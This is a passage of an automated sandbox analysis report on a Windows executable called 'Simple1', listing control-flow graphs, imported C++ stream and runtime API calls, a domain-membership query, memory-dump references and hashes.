1226->1229 1227->1229 1228->1220 1231 7ff71e399d62-7ff71e399d65 1228->1231 1229->1213 1231->1226
            APIs
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF71E399C8A
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF71E399CAA
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF71E399CBA
            • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF71E399D07
            • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF71E399D31
            • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF71E399D56
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF71E399D9D
            • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF71E399DA4
            • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF71E399DB1
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
            • String ID:
            • API String ID: 3397294066-0
            • Opcode ID: 9340df2d7b22759f6c791cb39ea6ec1440f113354fa38e5be513034bf6c266e4
            • Instruction ID: 838fb416c65c1e6f4a12a1346a5c0bc4b8224de894c534e36d95a9153ab625c4
            • Opcode Fuzzy Hash: 9340df2d7b22759f6c791cb39ea6ec1440f113354fa38e5be513034bf6c266e4
            • Instruction Fuzzy Hash: 0A511232609E4281EB21AF1AD5D4239E7E0FB84FA5B59C535DE5E437A0CF3DE44A8710

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1232 7ff71e3999f0-7ff71e399a19 1233 7ff71e399a20-7ff71e399a27 1232->1233 1233->1233 1234 7ff71e399a29-7ff71e399a38 1233->1234 1235 7ff71e399a44 1234->1235 1236 7ff71e399a3a-7ff71e399a3d 1234->1236 1238 7ff71e399a46-7ff71e399a56 1235->1238 1236->1235 1237 7ff71e399a3f-7ff71e399a42 1236->1237 1237->1238 1239 7ff71e399a5f-7ff71e399a71 ?good@ios_base@std@@QEBA_NXZ 1238->1239 1240 7ff71e399a58-7ff71e399a5e 1238->1240 1241 7ff71e399aa3-7ff71e399aa9 1239->1241 1242 7ff71e399a73-7ff71e399a82 1239->1242 1240->1239 1243 7ff71e399ab5-7ff71e399ac8 1241->1243 1244 7ff71e399aab-7ff71e399ab0 1241->1244 1246 7ff71e399aa1 1242->1246 1247 7ff71e399a84-7ff71e399a87 1242->1247 1249 7ff71e399aca 1243->1249 1250 7ff71e399afd-7ff71e399b18 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1243->1250 1248 7ff71e399b6d-7ff71e399b8b ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1244->1248 1246->1241 1247->1246 1251 7ff71e399a89-7ff71e399a9f ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1247->1251 1255 7ff71e399b97-7ff71e399ba7 1248->1255 1256 7ff71e399b8d-7ff71e399b96 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1248->1256 1252 7ff71e399ad0-7ff71e399ad3 1249->1252 1253 7ff71e399b46 1250->1253 1254 7ff71e399b1a 1250->1254 1251->1241 1252->1250 1259 7ff71e399ad5-7ff71e399aef ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1252->1259 1261 7ff71e399b49 1253->1261 1260 7ff71e399b20-7ff71e399b23 1254->1260 1257 7ff71e399bb0-7ff71e399bc4 1255->1257 1258 7ff71e399ba9-7ff71e399baf 1255->1258 1256->1255 1258->1257 1262 7ff71e399af1-7ff71e399af6 1259->1262 1263 7ff71e399af8-7ff71e399afb 1259->1263 1264 7ff71e399b25-7ff71e399b3f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1260->1264 1265 7ff71e399b4d-7ff71e399b5d 1260->1265 1261->1265 1262->1261 1263->1252 1264->1253 1267 7ff71e399b41-7ff71e399b44 1264->1267 1265->1248 1267->1260
            APIs
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A69
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A89
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A99
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399AE6
            • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B0F
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B36
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B7C
            • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B83
            • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B90
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
            • String ID:
            • API String ID: 1135186806-0
            • Opcode ID: 5814e694fa5f361751dc898f9d5e21bc3f4dd92118ae153b6ae81dfab933b90a
            • Instruction ID: 438e540a9770921d152f5a594da05530214b89136305eec9426f59d8fb56bb1b
            • Opcode Fuzzy Hash: 5814e694fa5f361751dc898f9d5e21bc3f4dd92118ae153b6ae81dfab933b90a
            • Instruction Fuzzy Hash: D2512132609E4282EB20AF1AD5D0238E7A0FF85FA5F59C535DA5E477A1CF3DE44A8310

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1268 7ff71e39b080-7ff71e39b0ba 1269 7ff71e39b0c6 1268->1269 1270 7ff71e39b0bc-7ff71e39b0bf 1268->1270 1272 7ff71e39b0c8-7ff71e39b0d8 1269->1272 1270->1269 1271 7ff71e39b0c1-7ff71e39b0c4 1270->1271 1271->1272 1273 7ff71e39b0e1-7ff71e39b0f3 ?good@ios_base@std@@QEBA_NXZ 1272->1273 1274 7ff71e39b0da-7ff71e39b0e0 1272->1274 1275 7ff71e39b125-7ff71e39b12b 1273->1275 1276 7ff71e39b0f5-7ff71e39b104 1273->1276 1274->1273 1277 7ff71e39b137-7ff71e39b150 1275->1277 1278 7ff71e39b12d-7ff71e39b132 1275->1278 1280 7ff71e39b123 1276->1280 1281 7ff71e39b106-7ff71e39b109 1276->1281 1283 7ff71e39b152-7ff71e39b155 1277->1283 1284 7ff71e39b184-7ff71e39b19f ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1277->1284 1282 7ff71e39b1ef-7ff71e39b20d ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1278->1282 1280->1275 1281->1280 1285 7ff71e39b10b-7ff71e39b121 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1281->1285 1286 7ff71e39b20f-7ff71e39b218 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1282->1286 1287 7ff71e39b219-7ff71e39b228 1282->1287 1283->1284 1288 7ff71e39b157-7ff71e39b172 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1283->1288 1289 7ff71e39b1a1-7ff71e39b1a4 1284->1289 1290 7ff71e39b1c8-7ff71e39b1cb 1284->1290 1285->1275 1286->1287 1291 7ff71e39b231-7ff71e39b24b 1287->1291 1292 7ff71e39b22a-7ff71e39b230 1287->1292 1293 7ff71e39b17f-7ff71e39b182 1288->1293 1294 7ff71e39b174-7ff71e39b17d 1288->1294 1295 7ff71e39b1cf-7ff71e39b1df 1289->1295 1296 7ff71e39b1a6-7ff71e39b1c1 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1289->1296 1290->1295 1292->1291 1293->1283 1294->1289 1295->1282 1296->1290 1297 7ff71e39b1c3-7ff71e39b1c6 1296->1297 1297->1289
            APIs
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF71E391AD2), ref: 00007FF71E39B0EB
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF71E391AD2), ref: 00007FF71E39B10B
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF71E391AD2), ref: 00007FF71E39B11B
            • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF71E391AD2), ref: 00007FF71E39B168
            • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF71E391AD2), ref: 00007FF71E39B196
            • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF71E391AD2), ref: 00007FF71E39B1B7
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF71E391AD2), ref: 00007FF71E39B1FE
            • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF71E391AD2), ref: 00007FF71E39B205
            • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF71E391AD2), ref: 00007FF71E39B212
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
            • String ID:
            • API String ID: 3397294066-0
            • Opcode ID: d4daf986c591b3d0968fda3093ef46c4df527e5844f88b62d69c232397f5e4b9
            • Instruction ID: 69f88f6f817ce0601c8e93bf5e5a436bea4b28373af0019aa33324293f513917
            • Opcode Fuzzy Hash: d4daf986c591b3d0968fda3093ef46c4df527e5844f88b62d69c232397f5e4b9
            • Instruction Fuzzy Hash: 6A511032608E4181EB24AF1AE584239E7A0FF84FA5B95843ADE4F43760CF3DE44AC314
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
            • String ID:
            • API String ID: 1133592946-0
            • Opcode ID: c72b868e27cb6210fe93b8e03fa8e66d7301bfa151cb37a32990f55088ab15a1
            • Instruction ID: 91715e7b7b42ed9c82333749e8aeb28edc194a27764007e2ffb65183f1cb0fd5
            • Opcode Fuzzy Hash: c72b868e27cb6210fe93b8e03fa8e66d7301bfa151cb37a32990f55088ab15a1
            • Instruction Fuzzy Hash: 57312C21A0CD4382FA58BB6594553B9A291AF857A4FC4443DEA4E4B2D3DF2DF84C8734
            APIs
            • memset.VCRUNTIME140 ref: 00007FF71E393FAC
              • Part of subcall function 00007FF71E396810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E39684A
              • Part of subcall function 00007FF71E396810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF71E396866
              • Part of subcall function 00007FF71E396810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E396898
            • NetGetJoinInformation.NETAPI32 ref: 00007FF71E393FC8
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E394071
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E394143
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E39414D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@InformationJoinV?$basic_streambuf@_invalid_parameter_noinfo_noreturnmemset
            • String ID: Domain:
            • API String ID: 3601429228-3214134553
            • Opcode ID: ee745bce1fe4204eeb29a3ebd1b26f5e4d0d6cce49e011f36a3eb2c09d1040a3
            • Instruction ID: 6e09120f05d5e97be5443f28682c5a92de11064084ab97aeec903037a7c44910
            • Opcode Fuzzy Hash: ee745bce1fe4204eeb29a3ebd1b26f5e4d0d6cce49e011f36a3eb2c09d1040a3
            • Instruction Fuzzy Hash: D051C672A18F8581EB10EB65D4802ADF3B1FB84BA4F84413AEA4D53B59DF3CE549C750
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
            • String ID:
            • API String ID: 762505753-0
            • Opcode ID: d6b85af30ed1ec3ab35491ff2678aa002b6a93c38241c4489de49d361cb69296
            • Instruction ID: 0f5845fb8ad3ec0102369b55ce5662d90a7bc33f3c72705274a3b03304ed1b52
            • Opcode Fuzzy Hash: d6b85af30ed1ec3ab35491ff2678aa002b6a93c38241c4489de49d361cb69296
            • Instruction Fuzzy Hash: AC314422608F4195EF14AF15E444169B7A0FB98FA4F880639EA9D077A9DF3CF459C720
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@_Yarn@malloc
            • String ID:
            • API String ID: 3292048638-0
            • Opcode ID: 5a8dc9a0dc8590c58db9ef850d11c0215e570e1dc75ccd2455c4e5ab0f5e0e6a
            • Instruction ID: 20d077432075b50ef33ae30008b3241026b86ad5d7ec89c0485b931420deacfc
            • Opcode Fuzzy Hash: 5a8dc9a0dc8590c58db9ef850d11c0215e570e1dc75ccd2455c4e5ab0f5e0e6a
            • Instruction Fuzzy Hash: 2041CD32919F42A1EA04EB12E954279B3A5FF99FA0F94413DD94E437A0DF3CB49D8360
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: df8cf8428a73b2714442bbd637f092005021725c8ab47a6cba6d15f8a732e014
            • Instruction ID: eb528664c77191ba0ceb2403d6696ee0fca219c92f1321a743b2c10cb558e9e0
            • Opcode Fuzzy Hash: df8cf8428a73b2714442bbd637f092005021725c8ab47a6cba6d15f8a732e014
            • Instruction Fuzzy Hash: 87317222B05A8286EA65AF26E5043B9A3A0FB44BE4F884439DF4D47750DF3CF49AD310
            APIs
            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF71E39107B), ref: 00007FF71E39B522
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E39B538
              • Part of subcall function 00007FF71E39BCA4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF71E39BCAD
              • Part of subcall function 00007FF71E39BCA4: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF71E39B53D,?,?,?,00007FF71E39107B), ref: 00007FF71E39BCBE
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E39B53E
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
            • String ID:
            • API String ID: 594857686-0
            • Opcode ID: e9edf898c5d7f4dfb26f66c19ba1068749b731ccc14c2137942b5775ec38785b
            • Instruction ID: 9ea66400b407c6b14ae8aeecfaf56eeae9ba2d244cbe5b196fe3102a45f754c1
            • Opcode Fuzzy Hash: e9edf898c5d7f4dfb26f66c19ba1068749b731ccc14c2137942b5775ec38785b
            • Instruction Fuzzy Hash: EFE0E241E0A907A2FE6C72B224560B580A41F193B0EDC1B3CE9BF042C2AF1CF49D8538
            APIs
            • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF71E399E05
            • ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z.MSVCP140 ref: 00007FF71E399E11
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF71E399E1A
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?put@?$basic_ostream@_?widen@?$basic_ios@_V12@V12@_
            • String ID:
            • API String ID: 2094784882-0
            • Opcode ID: 7bf1451799b23f1ce879a372c8a86a1a3bb4693dc89d3fb925bfda278d19c75c
            • Instruction ID: 6ecb08d6e333033f6714284b75812a80da1a25c4c557291efde2b7555d3df8fb
            • Opcode Fuzzy Hash: 7bf1451799b23f1ce879a372c8a86a1a3bb4693dc89d3fb925bfda278d19c75c
            • Instruction Fuzzy Hash: 28D01724A84A0682EA08AF27F8941385360AF89F66B88A031DD0F47320CE3CE0998220
            APIs
            • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF71E399BE5
            • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF71E399BF1
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF71E399BFA
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: D@std@@@std@@U?$char_traits@V12@$?flush@?$basic_ostream@_?put@?$basic_ostream@?widen@?$basic_ios@U?$char_traits@_W@std@@@std@@
            • String ID:
            • API String ID: 2670548386-0
            • Opcode ID: a91e5c45519eb8f51b08b89dc2630a913814ba17e6fe4b3f6d8b063faadf772a
            • Instruction ID: a6ffe65a04afd2a62f7306a5c8c1ac49df4ebe87db92eaddecd9a8f09b22fe91
            • Opcode Fuzzy Hash: a91e5c45519eb8f51b08b89dc2630a913814ba17e6fe4b3f6d8b063faadf772a
            • Instruction Fuzzy Hash: A0D01221A44A06C1DA086F17F8540345350AF49F51B4C5435ED0F06320CE3CE0598220
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: _fseeki64fgetpos
            • String ID:
            • API String ID: 3401907645-0
            • Opcode ID: 84d1aada89cd4f08e3bbf216dfcb77ee72de2ef28ea993f6e0146b415928d795
            • Instruction ID: 5eaf73bb514663998cf0fd4bd9f205eef384b2f3ee4a535e6f6740df57c6d5c5
            • Opcode Fuzzy Hash: 84d1aada89cd4f08e3bbf216dfcb77ee72de2ef28ea993f6e0146b415928d795
            • Instruction Fuzzy Hash: 20314172605F4181EB609F1AD550368B3A0FB98FE8F848135EE5D877A4DF38E49AC710
            APIs
            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF71E391A88), ref: 00007FF71E3975C6
            • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF71E391A88), ref: 00007FF71E3975D7
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
